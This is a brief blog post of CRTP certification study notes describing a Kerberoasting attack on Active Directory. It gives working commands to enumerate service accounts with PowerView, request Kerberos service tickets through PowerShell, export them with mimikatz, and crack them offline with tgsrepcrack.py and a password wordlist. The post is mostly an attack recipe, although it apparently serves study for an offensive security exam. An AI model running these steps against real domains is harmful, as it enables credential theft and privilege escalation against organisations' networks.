CRTP (Kerberost)

Posted Sep 27, 2025

By Avinash Kattamanchi

1 min read

CRTP (Kerberost)

Kerberost

Methodology/Steps

First find all the SPN accounts

Select SPN of a domain admin since we doing privilege escalation

Set the SPN as the argumentlist value and create a new object ( request a TGS )

Export the all the tickets by mimikatz

Keep a note of the file name where the ticket is stored of that service

Crack the ticket

Find user accounts used as Service account

        
Get-NetUser -SPN
Get-NetUser -SPN -Verbose | select displayname,memberof

Request TGS

        
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/computer.domain.local"

Check if the TGS has been granted

klist

Export all the tickets

Copy the file name of the ticket you exported; In this case its the file path for MSSQLSvc
1 Invoke-Mimikatz -Command '"kerberos::list /export"'

tgsrepcrack

Request-SPNTicket with PowerView can be used for cracking with JTR
1 python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-40a10000-user1@MSSQLSvc~computer.domain.localDOMAIN.LOCAL.kirbi

This post is licensed under CC BY 4.0 by the author.

Kerberost

Methodology/Steps

Find user accounts used as Service account

Request TGS

Check if the TGS has been granted

Export all the tickets

tgsrepcrack

Trending Tags